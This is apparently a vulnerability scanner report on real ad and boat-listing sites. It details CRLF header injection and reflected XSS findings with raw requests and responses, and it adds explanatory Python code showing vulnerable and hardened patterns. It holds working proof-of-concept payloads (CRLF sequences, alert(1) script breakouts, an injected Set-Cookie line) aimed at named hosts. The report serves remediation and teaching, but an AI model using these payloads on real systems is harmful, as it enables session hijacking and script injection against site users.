Set-Cookie: savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:24 GMT
Set-Cookie: savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=24-32%20ft; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:24 GMT
Set-Cookie: savedSearch1=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch1=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:24 GMT
Set-Cookie: savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=278e2
3167851441c
; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:24 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>



...[SNIP]...

2.12. http://wzus1.ask.com/i/i.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wzus1.ask.com
Path:   /i/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ccd1c%0d%0a07743971c78 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ccd1c%0d%0a07743971c78/i.gif?t=v&d=us&s=a&c=h&l=dir&o=0&sv=0a5c404a&p=homepage&ord=7097259 HTTP/1.1
Host: wzus1.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:13:15 GMT
Set-Cookie: wz_uid=0D47D9451CCD32C3B9ACD8C41BD460F3; path=/; expires=Sat, 26-Jan-2013 19:13:15 GMT; domain=.ask.com
Set-Cookie: wz_sid=0E49DA4619CD32C3B9ACD8C41BD460F3; path=/; expires=Thu, 27-Jan-2011 19:43:15 GMT; domain=.ask.com
Set-Cookie: wz_scnt=1; path=/; expires=Sat, 26-Jan-2013 19:13:15 GMT; domain=.ask.com
Location: http://wzus1.ask.com/ccd1c
07743971c78
/i.gif?t=S&d=us&s=a&c=h&l=dir&o=0&sv=0a5c404a&p=homepage&ord=7097259&wz_uid=1&wz_sid=1&wz_aid=0&uid=0&sid=0&aid=0&askeraser=0&scnt=0&wz_tid=0&
Content-Length: 437
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://wzus1.ask.com/ccd1c
07743971c78/i.gif?t
...[SNIP]...

2.13. http://wzus1.ask.com/i/i.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wzus1.ask.com
Path:   /i/i.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 4af04%0d%0ad83a2a5f4ce was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /i/4af04%0d%0ad83a2a5f4ce?t=v&d=us&s=a&c=h&l=dir&o=0&sv=0a5c404a&p=homepage&ord=7097259 HTTP/1.1
Host: wzus1.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:13:15 GMT
Set-Cookie: wz_uid=0743D74113CE32C3B9ACD8C41BD460F3; path=/; expires=Sat, 26-Jan-2013 19:13:15 GMT; domain=.ask.com
Set-Cookie: wz_sid=064AD0401ECE32C3B9ACD8C41BD460F3; path=/; expires=Thu, 27-Jan-2011 19:43:15 GMT; domain=.ask.com
Set-Cookie: wz_scnt=1; path=/; expires=Sat, 26-Jan-2013 19:13:15 GMT; domain=.ask.com
Location: http://wzus1.ask.com/i/4af04
d83a2a5f4ce
?t=S&d=us&s=a&c=h&l=dir&o=0&sv=0a5c404a&p=homepage&ord=7097259&wz_uid=1&wz_sid=1&wz_aid=0&uid=0&sid=0&aid=0&askeraser=0&scnt=0&wz_tid=0&
Content-Length: 433
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://wzus1.ask.com/i/4af04
d83a2a5f4ce?t=S&a
...[SNIP]...
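
Every finding in section 2 has the same shape: a decoded request value (query parameter, REST path segment or cookie) is concatenated into a Location or Set-Cookie header, so a %0d%0a inside it ends that header and whatever follows is parsed as the next one (CWE-113). The example below is added here and is not code from the scanned sites or from the scanner. It reproduces that pattern beside a hardened redirect builder and cookie builder, and parses the resulting response head the way a lenient client would. The redirect base URL, the parameter names and the cookie name are taken from findings 2.8 and 2.10; the injected Set-Cookie line in the payload is a constructed illustration of what a real attacker would put after the CRLF, and the function names are hypothetical.

```python
"""HTTP header injection (CWE-113) as in findings 2.1-2.13: vulnerable pattern,
hardened builders, and a parser that shows what a client would see.
Added example; the URL, parameter and cookie names come from the report,
the Set-Cookie payload is constructed."""
import re
from urllib.parse import quote, unquote, urlencode

# Control characters that must never reach a header value.
CTL = re.compile(r"[\x00-\x1f\x7f]")

BASE = "http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp"

# Decoded form of the kind of value the scanner sent (%0d%0a), here carrying a
# constructed Set-Cookie line instead of a random marker.
SLIM_PAYLOAD = unquote("d9915%0d%0aSet-Cookie:%20attacker%3D1")
PARAMS = {"currency": "USD", "units": "Feet", "id": "2267335", "slim": SLIM_PAYLOAD}


def parse_response_head(raw):
    """Split a raw HTTP/1.x response into (name, value) header pairs.

    Like most clients it accepts a bare LF as a line terminator, which is why a
    single %0d%0a (or even %0a) inside a value is enough to start a new header.
    Lines without a colon are kept with value None so injected garbage stays
    visible instead of being silently dropped."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    headers = []
    for line in re.split(r"\r?\n", head)[1:]:  # element 0 is the status line
        name, sep, value = line.partition(":")
        headers.append((name.strip(), value.strip()) if sep else (line, None))
    return headers


def header_names(raw):
    return [name for name, _ in parse_response_head(raw)]


def redirect_vulnerable(base, params):
    """Mirror of what the handler appears to do: already-decoded query values
    are concatenated into Location with no re-encoding and no CR/LF check."""
    query = "&".join(f"{k}={v}" for k, v in params.items())
    return f"HTTP/1.0 302 Found\r\nLocation: {base}?{query}&\r\nContent-Length: 0\r\n\r\n"


def redirect_safe(base, params):
    """Same redirect with two independent controls: refuse control characters
    outright, and percent-encode every value so CR/LF (and &, =, #) can never
    be read as header or URL structure."""
    for name, value in params.items():
        if CTL.search(value):
            raise ValueError(f"control character in parameter {name!r}")
    return f"HTTP/1.0 302 Found\r\nLocation: {base}?{urlencode(params)}\r\nContent-Length: 0\r\n\r\n"


def safe_redirect_rejects(params):
    """True if redirect_safe refuses the parameters."""
    try:
        redirect_safe(BASE, params)
    except ValueError:
        return True
    return False


def set_cookie_header(name, value):
    """Build a Set-Cookie line whose value cannot break out of the header.

    RFC 6265 cookie-values may not contain CTLs, whitespace, '"', ',', ';' or
    backslash; quote(..., safe="") percent-encodes all of them, and the name
    is restricted to token characters so it cannot smuggle a separator."""
    if not re.fullmatch(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+", name):
        raise ValueError(f"invalid cookie name {name!r}")
    return f"Set-Cookie: {name}={quote(value, safe='')}; Path=/; HttpOnly"


if __name__ == "__main__":
    # The attacker's line becomes a real header in the vulnerable response.
    print(header_names(redirect_vulnerable(BASE, PARAMS)))
    # -> ['Location', 'Set-Cookie', 'Content-Length']
    print("safe builder rejects payload:", safe_redirect_rejects(PARAMS))  # True
    print(set_cookie_header("savedLabel0", "ab4ad\r\n2d954fcf23f"))
    # -> Set-Cookie: savedLabel0=ab4ad%0D%0A2d954fcf23f; Path=/; HttpOnly
```

The encoding step alone would already neutralise the CRLF; the explicit rejection is there because a value containing control characters is never legitimate in these parameters, and failing loudly surfaces probing in the logs. Note that the rejection has to happen on the decoded value (what the container hands the application), not on the raw query string, since the scanner's %0d%0a is only a CRLF after decoding.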

3. Cross-site scripting (reflected)
There are 578 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain (for example, a numeric identifier should only contain digits); and user input should be HTML-encoded at any point where it is copied into application responses, so that characters such as <, >, ", ' and & are rendered as their entity equivalents rather than interpreted as markup. Where the data lands in a different context (a JavaScript string, a URL, a CSS value), the encoding appropriate to that context must be applied as well.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ads.pointroll.com/PortalServe/ [flash parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96119"%3balert(1)//f168ce1767a was submitted in the flash parameter. This input was echoed as 96119";alert(1)//f168ce1767a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
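
The response in this finding nests three contexts: a JavaScript string literal passed to document.write, containing an iframe tag, whose src attribute contains a URL that carries the flash value. The payload only needs one unescaped double quote to leave the innermost layer and land in script context. The example below is added here and is not code from the ad server or from the scanner. It renders the same document.write("<iframe ...>") pattern, first by raw concatenation and then with each context encoded from the inside out (URL query, then HTML attribute, then JS string literal), and uses a small JS string scanner to show whether the reflected value escaped the literal. The pointroll URL, the flash parameter and server=polRedir come from the report; the iframe id and the function names are hypothetical.

```python
"""Reflected XSS into a double-quoted JavaScript string (finding 3.1):
vulnerable rendering, context-aware encoding, and a check for string breakout.
Added example; the ad URL and parameter come from the report, the rest is
hypothetical."""
import html
import json
from urllib.parse import urlencode

# Payload from finding 3.1: closes the string, runs alert(1), comments out the rest.
PAYLOAD = '96119";alert(1)//f168ce1767a'
AD_URL = "http://ads.pointroll.com/PortalServe/"


def render_vulnerable(flash):
    """Raw concatenation, as in the scanned response: the double quote in the
    value terminates the JS string literal and the rest runs as code."""
    return ('document.write("<iframe id=\'profr\' src=\'' + AD_URL
            + '?flash=' + flash + '&server=polRedir\' width=\'728\' height=\'90\'></iframe>");')


def js_string_literal(value):
    """Encode value as a JS string literal that is safe inside a <script> block.

    json.dumps escapes quotes, backslashes and C0 controls; the extra
    replacements stop </script>, <!-- and entities from being seen by the HTML
    tokeniser (which scans the script body before any JS runs) and keep
    U+2028/U+2029 from ending the line in older engines."""
    out = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        out = out.replace(ch, esc)
    return out


def render_safe(flash):
    """Encode inside-out: percent-encode the query value, entity-encode the URL
    for the attribute, then emit the finished markup as a JS string literal."""
    url = AD_URL + "?" + urlencode({"flash": flash, "server": "polRedir"})
    markup = ("<iframe id='profr' src='" + html.escape(url, quote=True)
              + "' width='728' height='90'></iframe>")
    return "document.write(" + js_string_literal(markup) + ");"


def first_js_string(script):
    """Return (contents, remainder) for the first double-quoted JS string
    literal in script, honouring backslash escapes. If a reflected value broke
    out of the literal, the remainder starts with attacker-controlled code."""
    i = script.index('"') + 1
    buf = []
    while i < len(script):
        c = script[i]
        if c == "\\":
            buf.append(script[i:i + 2])  # keep escape sequences intact
            i += 2
        elif c == '"':
            return "".join(buf), script[i + 1:]
        else:
            buf.append(c)
            i += 1
    raise ValueError("unterminated string literal")


def breaks_out(render, flash):
    """True if alert(1) ends up outside the string literal, i.e. as code."""
    _, remainder = first_js_string(render(flash))
    return "alert(1)" in remainder


if __name__ == "__main__":
    print("vulnerable breaks out:", breaks_out(render_vulnerable, PAYLOAD))  # True
    print("safe breaks out:", breaks_out(render_safe, PAYLOAD))              # False
    print(render_safe(PAYLOAD))
```

The order of encodings matters: the browser decodes them in reverse (JS string first, then HTML, then the URL when the iframe loads), so encoding the value for the query first and the JS literal last is what keeps each decoder from handing the next one something it can misread. Encoding only for HTML, which is what many templating defaults do, would leave the double quote intact and the finding unchanged.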

Request

GET /PortalServe/?pid=1166930O62320101223173924&flash=1096119"%3balert(1)//f168ce1767a&time=4|13:19|-6&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$&r=0.09495983109809458 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CGJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmsqeeAmKAGSBCeJC5EmquI3yjbAwiBDeJWGEmrX5yd4zACLBEe; PRgo=BBBAAsJvEBVBF4FRCF-19!BDC_!B!BECb!B!B; PRimp=CA9A0400-789E-8A09-0309-05A001920102; PRca=|AJxY*1039:1|AJd9*1774:1|AJcC*23172:5|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJcCAAB5:3|AJcCAACG:1|AJxYAAQl:1|AJd9AA2c:1|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|Epn7:1|Epn6:2|FAnn:1|Eyzw:1|Eihq:1|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|Fy8u:1|Fy8x:1|GAty:1|FwyX:1|Fy9A:3|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|Epn7Fy8u:1|Epn6Fy9A:2|FAnnFy8x:1|EyzwGAty:1|EihqFwyX:1|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 27 Jan 2011 19:25:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1166930' src='http://ads.pointroll.com/PortalServe/?pid=1166930O62320101223173924&cid=1423823&pos=h&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/
...[SNIP]...
ults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c%3F$CTURL$&time=4|13:19|-6&r=0.09495983109809458&flash=1096119";alert(1)//f168ce1767a&server=polRedir' width='728' height='90' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.2. http://ads.pointroll.com/PortalServe/ [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec695"%3balert(1)//d5deaeaae19 was submitted in the r parameter. This input was echoed as ec695";alert(1)//d5deaeaae19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1166930O62320101223173924&flash=10&time=4|13:19|-6&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$&r=0.09495983109809458ec695"%3balert(1)//d5deaeaae19 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CGJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmsqeeAmKAGSBCeJC5EmquI3yjbAwiBDeJWGEmrX5yd4zACLBEe; PRgo=BBBAAsJvEBVBF4FRCF-19!BDC_!B!BECb!B!B; PRimp=CA9A0400-789E-8A09-0309-05A001920102; PRca=|AJxY*1039:1|AJd9*1774:1|AJcC*23172:5|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJcCAAB5:3|AJcCAACG:1|AJxYAAQl:1|AJd9AA2c:1|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|Epn7:1|Epn6:2|FAnn:1|Eyzw:1|Eihq:1|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|Fy8u:1|Fy8x:1|GAty:1|FwyX:1|Fy9A:3|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|Epn7Fy8u:1|Epn6Fy9A:2|FAnnFy8x:1|EyzwGAty:1|EihqFwyX:1|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 27 Jan 2011 19:25:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1166930' src='http://ads.pointroll.com/PortalServe/?pid=1166930O62320101223173924&cid=1423823&pos=h&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/
...[SNIP]...
searchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c%3F$CTURL$&time=4|13:19|-6&r=0.09495983109809458ec695";alert(1)//d5deaeaae19&flash=10&server=polRedir' width='728' height='90' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.3. http://ads.pointroll.com/PortalServe/ [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db52a"-alert(1)-"6c059e5e36d was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1166930O62320101223173924&flash=10&time=4|13:19|-6&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$db52a"-alert(1)-"6c059e5e36d&r=0.09495983109809458 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CGJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmsqeeAmKAGSBCeJC5EmquI3yjbAwiBDeJWGEmrX5yd4zACLBEe; PRgo=BBBAAsJvEBVBF4FRCF-19!BDC_!B!BECb!B!B; PRimp=CA9A0400-789E-8A09-0309-05A001920102; PRca=|AJxY*1039:1|AJd9*1774:1|AJcC*23172:5|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJcCAAB5:3|AJcCAACG:1|AJxYAAQl:1|AJd9AA2c:1|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|Epn7:1|Epn6:2|FAnn:1|Eyzw:1|Eihq:1|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|Fy8u:1|Fy8x:1|GAty:1|FwyX:1|Fy9A:3|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|Epn7Fy8u:1|Epn6Fy9A:2|FAnnFy8x:1|EyzwGAty:1|EihqFwyX:1|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 27 Jan 2011 19:25:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1166930' src='http://ads.pointroll.com/PortalServe/?pid=1166930O62320101223173924&cid=1423823&pos=h&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c%3F$CTURL$db52a"-alert(1)-"6c059e5e36d&time=4|13:19|-6&r=0.09495983109809458&flash=10&server=polRedir' width='728' height='90' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.4. http://ads.pointroll.com/PortalServe/ [time parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93bab"%3balert(1)//ee44a590352 was submitted in the time parameter. This input was echoed as 93bab";alert(1)//ee44a590352 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1166930O62320101223173924&flash=10&time=4|13:19|-693bab"%3balert(1)//ee44a590352&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$&r=0.09495983109809458 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
